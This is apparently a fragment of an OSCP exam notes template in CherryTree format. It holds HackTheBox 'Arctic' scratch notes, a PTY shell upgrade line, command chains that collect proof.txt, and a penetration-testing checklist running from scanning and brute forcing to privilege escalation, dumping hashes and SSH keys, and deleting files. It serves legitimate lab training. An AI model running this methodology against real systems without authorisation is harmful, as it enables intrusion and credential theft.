				<rich_text link="webs https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49">https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49</rich_text>
				<rich_text>
*renamed to phtml to upload


Upgrade to PTY shell:
python -c ‘import.pty: pty.spawn(&quot;/bin/bash&quot;)’
---
C:\ColdFusion8\runtime\bin&gt;whoami
whoami
arctic\tolis

systeminfo | findstr /B /C:&quot;OS Name&quot; /C:&quot;OS Version&quot;
OS Name:                   Microsoft Windows Server 2008 R2 Standard 
OS Version:                6.1.7600 N/A Build 7600

python wes.py ../htb/arctic/arctic_sysinfo &gt; ../htb/arctic/arcticVulns.txt






</rich_text>
				<rich_text underline="single" weight="heavy">Proof\Local.txt File</rich_text>
				<rich_text>

   ☐ Screenshot with ifconfig\ipconfig
   ☐ Submit too OSCP Exam Panel

</rich_text>
			</node>
			<node custom_icon_id="43" foreground="" is_bold="False" name="Goodies" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949508.15" unique_id="64">
				<rich_text></rich_text>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Hashes" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492949998.88" unique_id="65">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Passwords" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1492950150.97" unique_id="66">
					<rich_text></rich_text>
				</node>
				<node custom_icon_id="18" foreground="" is_bold="False" name="Proof\Flags\Other" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1587583059.94" unique_id="67">
					<rich_text scale="h1">Linux</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<rich_text>

</rich_text>
					<rich_text scale="h1">Windows</rich_text>
					<rich_text>
</rich_text>
					<rich_text justification="left"></rich_text>
					<codebox char_offset="6" frame_height="140" frame_width="765" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="sh" width_in_pixels="True">echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ifconfig:&quot;;/sbin/ifconfig -a;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat /Desktop/proof.txt 2&gt;/dev/null;echo &quot; &quot; 

echo &quot; &quot;;echo &quot;uname -a:&quot;;uname -a;echo &quot; &quot;;echo &quot;hostname:&quot;;hostname;echo &quot; &quot;;echo &quot;id&quot;;id;echo &quot; &quot;;echo &quot;ip address:&quot;;ip address;echo &quot; &quot;;echo &quot;proof:&quot;;cat /root/proof.txt 2&gt;/dev/null; cat ./local.txt 2&gt;/dev/null;echo &quot; &quot;</codebox>
					<codebox char_offset="17" frame_height="230" frame_width="785" highlight_brackets="True" show_line_numbers="False" syntax_highlighting="dosbatch" width_in_pixels="True">echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\admin\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Documents and Settings\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\Desktop\proof.txt 2&gt; nul

#french
echo. &amp; echo. &amp; echo whoami: &amp; whoami 2&gt; nul &amp; echo %username% 2&gt; nul &amp; echo. &amp; echo Hostname: &amp; hostname &amp; echo. &amp; ipconfig /all &amp; echo. &amp; echo proof.txt: &amp; type &quot;C:\Users\Administrator\Desktop\proof.txt&quot; 2&gt; nul &amp; type &quot;C:\Docume~1\Admini~1\Bureau\proof.txt&quot; 2&gt; nul &amp; type %USERPROFILE%\bureau\proof.txt 2&gt; nul</codebox>
				</node>
			</node>
			<node custom_icon_id="12" foreground="" is_bold="False" name="Software Versions" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1496953122.23" unique_id="68">
				<rich_text underline="single" weight="heavy">Software Versions
</rich_text>
				<rich_text>





</rich_text>
				<rich_text underline="single" weight="heavy">Potential Exploits</rich_text>
			</node>
			<node custom_icon_id="13" foreground="" is_bold="True" name="Methodology" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1496953072.48" ts_lastsave="1500474082.49" unique_id="69">
				<rich_text underline="single" weight="heavy">Network Scanning</rich_text>
				<rich_text>

   ☐  nmap -sn 10.11.1.*
   ☐  nmap -sL 10.11.1.*
   ☐  nbtscan -r 10.11.1.0/24
   ☐  </rich_text>
				<rich_text link="node 70">smbtree</rich_text>
				<rich_text>

</rich_text>
				<rich_text underline="single" weight="heavy">Individual Host Scanning</rich_text>
				<rich_text>

   ☐  nmap  --top-ports 20 --open -iL iplist.txt
   ☐  nmap -sS -A -sV -O -p- ipaddress
   ☐  nmap -sU ipaddress

</rich_text>
				<rich_text underline="single" weight="heavy">Service Scanning</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">WebApp</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 69">Nikto</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 52">dirb</rich_text>
				<rich_text>
      ☐   dirbuster
      ☐   </rich_text>
				<rich_text link="node 71">wpscan</rich_text>
				<rich_text>
      ☐   dotdotpwn
      ☐   view source 
      ☐   davtest\cadevar
      ☐   droopscan
      ☐   joomscan
      ☐   LFI\RFI Test
      
    </rich_text>
				<rich_text weight="heavy">Linux\Windows</rich_text>
				<rich_text>
      ☐   snmpwalk -c public -v1 </rich_text>
				<rich_text style="italic">ipaddress</rich_text>
				<rich_text> 1
      ☐   smbclient -L //ipaddress
      ☐   showmount -e ipaddress port
      ☐   rpcinfo
      ☐   Enum4Linux
    
    </rich_text>
				<rich_text weight="heavy">Anything Else</rich_text>
				<rich_text>
      ☐   </rich_text>
				<rich_text link="node 72">nmap scripts</rich_text>
				<rich_text> (locate *nse* | grep servicename)
      ☐   </rich_text>
				<rich_text link="node 73">hydra</rich_text>
				<rich_text>
      ☐   MSF Aux Modules
      ☐   Download the softward

</rich_text>
				<rich_text underline="single" weight="heavy">Exploitation</rich_text>
				<rich_text>
   ☐   Gather Version Numbes
   ☐   Searchsploit
   ☐   Default Creds
   ☐   Creds Previously Gathered
   ☐   Download the software

</rich_text>
				<rich_text underline="single" weight="heavy">Post Exploitation</rich_text>
				<rich_text>

    </rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
      ☐   linux-local-enum.sh
      ☐   linuxprivchecker.py
      ☐   linux-exploit-suggestor.sh
      ☐   unix-privesc-check.py

    </rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
      ☐   wpc.exe
      ☐   windows-exploit-suggestor.py
      ☐   </rich_text>
				<rich_text link="webs https://github.com/pentestmonkey/windows-privesc-check/blob/master/windows_privesc_check.py">windows_privesc_check.py</rich_text>
				<rich_text>
      ☐  	windows-privesc-check2.exe

</rich_text>
				<rich_text underline="single" weight="heavy">Priv Escalation</rich_text>
				<rich_text>
   ☐  </rich_text>
				<rich_text link="node 74">acesss internal services (portfwd)</rich_text>
				<rich_text>
   ☐  add account

</rich_text>
				<rich_text weight="heavy">Windows</rich_text>
				<rich_text>
   ☐  List of exploits

</rich_text>
				<rich_text weight="heavy">Linux</rich_text>
				<rich_text>
   ☐  sudo su 
   ☐  KernelDB
   ☐  Searchsploit

</rich_text>
				<rich_text underline="single" weight="heavy">Final</rich_text>
				<rich_text>
   ☐  Screenshot of IPConfig\WhoamI
   ☐  Copy proof.txt
   ☐  Dump hashes 
   ☐  Dump SSH Keys
   ☐  Delete files</rich_text>
			</node>
			<node custom_icon_id="20" foreground="" is_bold="True" name="Log Book" prog_lang="custom-colors" readonly="False" tags="" ts_creation="0.0" ts_lastsave="1495714168.37" unique_id="75">
				<rich_text></rich_text>
			</node>
		</node>
	</node>
</cherrytree>
